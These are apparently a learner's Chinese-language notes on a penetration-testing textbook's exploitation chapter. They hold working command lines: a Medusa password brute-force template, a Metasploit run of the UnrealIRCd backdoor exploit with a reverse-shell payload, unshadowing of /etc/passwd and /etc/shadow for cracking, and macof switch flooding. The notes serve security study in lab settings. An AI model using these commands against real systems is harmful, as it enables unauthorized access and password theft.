渗透测试实践-漏洞利用
本文是我阅读《渗透测试实践指南·第四章·漏洞利用》所做的笔记。
零、开始
- 漏洞利用是获得系统控制权限的过程
- 以扫描成果组织、确定并指导漏洞利用
一、利用Medusa获得远程服务的访问权限
- Medusa是一款在线密码破解工具,Kali中默认安装
- Kali自带密码字典:/usr/share/wordlists/
- 用侦查所得信息生成针对性用户名、密码字典
- 电子邮箱前缀往往是用户名
- 尝试另一款在线密码破解工具:Hydra
medusa -h target_ip -u username -P path_to_password_dictionary -M authentication_service_to_attack
二、Metasploit:用Hugh Jackman的方式进行入侵
- Hugh Jackman——《剑鱼行动》主角
- 攻击荷载回答的问题是:“我已经控制了机器,接着要干嘛?”
- Metasploit是手术刀不是大板斧,是狙击枪不是机关枪
- 启动Metasploit:msfconsole
- 升级Metasploit:msfupdate
- 搜索漏洞对应攻击程序:search cve-2010-2075(ms、cve和bid等)
- 使用某一攻击程序:use exploit/unix/irc/unreal_ircd_3281_backdoor
- 显示可用攻击荷载:show payloads(会显示与已选攻击程序相匹配的所有攻击荷载)
- 设置payload:set payload cmd/unix/reverse
- 查看选项:show options
- 设置选项:set RHOST 192.168.56.251
- 核对选项:show options
- 发起攻击:exploit
三、John the Ripper:密码破解之王
- 测试硬件性能:john –test
- unshadow /etc/passwd /etc/shadow > /tmp/hash.txt
- 和hashcat差不多的东西
四、密码重置:破墙而入
- chntpw
五、Wireshark:流量嗅探
- 将网卡置为混杂模式
- 交换机环境下嗅探前可先运行Macof
- 用于中间人攻击的工具:Ettercap
六、Macof:巧妇能为无米之炊
- Macof是Dsniff工具集中的一个工具
- 失效开放(fail open):交换机匹配不到某报文目标MAC地址对应的端口时会将该报文发送到各个端口
- 失效关闭(fail close):某些交换机采用失效关闭策略
- 泛洪攻击:用大量伪造MAC地址填满交换机匹配表
macof -i eth0 -s 192.168.18.130 -d 192.168.18.2
七、Armitage:入侵工具中的超级明星
- 图形界面化的Metasploit
- 发现主机:Hosts -> Nmap Scan -> Quick Scan(OS detect)
- 进行入侵:Attacks -> Hail Mary
- Hail Mary是机关枪式的攻击,会尝试所有可能的攻击方式
八、结束
- Metasploit官方教程:Metasploit Unleashed
- 渗透测试模拟环境:De-ICE
- 不要轻易寻求别人的帮助、不要过早放弃、不要频繁依赖提示
- 硬着头皮啃一下乍一看似乎不可能完成的难题,这一过程具有很大的价值,可以充分挖掘学习的潜力